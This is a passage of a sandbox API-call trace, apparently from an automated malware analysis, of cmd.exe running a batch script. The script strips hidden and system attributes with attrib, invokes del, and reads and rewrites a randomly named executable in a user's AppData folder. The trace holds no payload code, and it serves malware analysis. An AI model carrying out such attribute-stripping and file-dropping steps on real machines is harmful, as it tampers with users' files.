(in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef4d4 | out: lpFindFileData=0x2ef4d4) returned 0x450c80 [0212.717] FindClose (in: hFindFile=0x450c80 | out: hFindFile=0x450c80) returned 1 [0212.718] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef4d4 | out: lpFindFileData=0x2ef4d4) returned 0x450c80 [0212.718] FindClose (in: hFindFile=0x450c80 | out: hFindFile=0x450c80) returned 1 [0212.718] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0212.718] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0212.718] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0212.718] GetEnvironmentStringsW () returned 0x4504a0* [0212.718] FreeEnvironmentStringsW (penv=0x4504a0) returned 1 [0212.718] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.718] GetConsoleOutputCP () returned 0x1b5 [0212.719] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0212.719] GetUserDefaultLCID () returned 0x409 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef898, cchData=128 | out: lpLCData="0") returned 2 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef898, cchData=128 | out: lpLCData="0") returned 2 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef898, cchData=128 | out: lpLCData="1") returned 2 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0212.719] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0212.720] GetConsoleTitleW (in: lpConsoleTitle=0x440ac8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.720] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0212.720] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0212.720] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0212.720] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0212.721] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0212.721] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0212.721] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0212.721] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0212.721] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0212.721] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0212.721] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0212.726] _wcsicmp (_String1="del", _String2=")") returned 59 [0212.726] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0212.726] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0212.726] _wcsicmp (_String1="IF", _String2="del") returned 5 [0212.726] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0212.726] _wcsicmp (_String1="REM", _String2="del") returned 14 [0212.726] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0212.728] _wcsicmp (_String1="type", _String2=")") returned 75 [0212.728] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0212.728] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0212.728] _wcsicmp (_String1="IF", _String2="type") returned -11 [0212.728] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0212.728] _wcsicmp (_String1="REM", _String2="type") returned -2 [0212.728] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0212.735] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0212.735] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.740] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.740] FindClose (in: hFindFile=0x452530 | out: hFindFile=0x452530) returned 1 [0212.741] FindClose (in: hFindFile=0x452530 | out: hFindFile=0x452530) returned 1 [0212.741] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0212.741] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0212.741] GetConsoleTitleW (in: lpConsoleTitle=0x2ef2c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.741] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef148, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef210 | out: lpAttributeList=0x2ef148, lpSize=0x2ef210) returned 1 [0212.741] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef148, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef208, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef148, lpPreviousValue=0x0) returned 1 [0212.741] GetStartupInfoW (in: lpStartupInfo=0x2ef104 | out: lpStartupInfo=0x2ef104*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0212.741] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0212.742] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef1a4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef1f0 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" ", lpProcessInformation=0x2ef1f0*(hProcess=0x50, hThread=0x4c, dwProcessId=0xa7c, dwThreadId=0xab0)) returned 1 [0212.744] CloseHandle (hObject=0x4c) returned 1 [0212.744] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0212.744] GetEnvironmentStringsW () returned 0x4509d0* [0212.744] FreeEnvironmentStringsW (penv=0x4509d0) returned 1 [0212.744] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0212.780] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2ef0e4 | out: lpExitCode=0x2ef0e4*=0x0) returned 1 [0212.780] CloseHandle (hObject=0x50) returned 1 [0212.780] _vsnwprintf (in: _Buffer=0x2ef22c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef0f0 | out: _Buffer="00000000") returned 8 [0212.780] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0212.780] GetEnvironmentStringsW () returned 0x452580* [0212.780] FreeEnvironmentStringsW (penv=0x452580) returned 1 [0212.780] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0212.780] GetEnvironmentStringsW () returned 0x452580* [0212.780] FreeEnvironmentStringsW (penv=0x452580) returned 1 [0212.780] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef148 | out: lpAttributeList=0x2ef148) [0212.780] GetConsoleTitleW (in: lpConsoleTitle=0x2ef4c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.781] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini" (normalized: "c:\\users\\default\\favori~1\\micros~1\\desktop.ini")) returned 0xffffffff [0212.781] GetLastError () returned 0x2 [0212.781] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1" (normalized: "c:\\users\\default\\favori~1\\micros~1")) returned 0x10 [0212.781] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0212.781] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0212.781] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini" (normalized: "c:\\users\\default\\favori~1\\micros~1\\desktop.ini")) returned 0xffffffff [0212.781] GetLastError () returned 0x2 [0212.781] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2eef74 | out: lpConsoleScreenBufferInfo=0x2eef74) returned 1 [0212.782] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0212.783] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0212.783] GetConsoleTitleW (in: lpConsoleTitle=0x2ef464, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.784] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0212.784] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.785] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.785] GetFileType (hFile=0x50) returned 0x1 [0212.785] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.785] GetFileType (hFile=0x50) returned 0x1 [0212.785] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.785] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.786] GetFileType (hFile=0x50) returned 0x1 [0212.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.786] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.786] GetFileType (hFile=0x50) returned 0x1 [0212.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.786] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.786] GetFileType (hFile=0x50) returned 0x1 [0212.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.786] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.786] GetFileType (hFile=0x50) returned 0x1 [0212.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.786] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.786] GetFileType (hFile=0x50) returned 0x1 [0212.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.786] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] GetFileType (hFile=0x50) returned 0x1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.787] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.787] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.787] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.787] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] GetFileType (hFile=0x50) returned 0x1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] GetFileType (hFile=0x50) returned 0x1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] GetFileType (hFile=0x50) returned 0x1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] GetFileType (hFile=0x50) returned 0x1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] GetFileType (hFile=0x50) returned 0x1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] GetFileType (hFile=0x50) returned 0x1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] GetFileType (hFile=0x50) returned 0x1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] GetFileType (hFile=0x50) returned 0x1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.788] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.788] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.788] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.788] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] GetFileType (hFile=0x50) returned 0x1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] GetFileType (hFile=0x50) returned 0x1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] GetFileType (hFile=0x50) returned 0x1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] GetFileType (hFile=0x50) returned 0x1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] GetFileType (hFile=0x50) returned 0x1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] GetFileType (hFile=0x50) returned 0x1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] GetFileType (hFile=0x50) returned 0x1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] GetFileType (hFile=0x50) returned 0x1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.789] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.789] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.789] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.789] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] GetFileType (hFile=0x50) returned 0x1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] GetFileType (hFile=0x50) returned 0x1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] GetFileType (hFile=0x50) returned 0x1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] GetFileType (hFile=0x50) returned 0x1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] GetFileType (hFile=0x50) returned 0x1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] GetFileType (hFile=0x50) returned 0x1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] GetFileType (hFile=0x50) returned 0x1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] GetFileType (hFile=0x50) returned 0x1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.790] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.790] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.790] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.790] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] GetFileType (hFile=0x50) returned 0x1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] GetFileType (hFile=0x50) returned 0x1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] GetFileType (hFile=0x50) returned 0x1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] GetFileType (hFile=0x50) returned 0x1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] WriteFile (in: hFile=0x50, 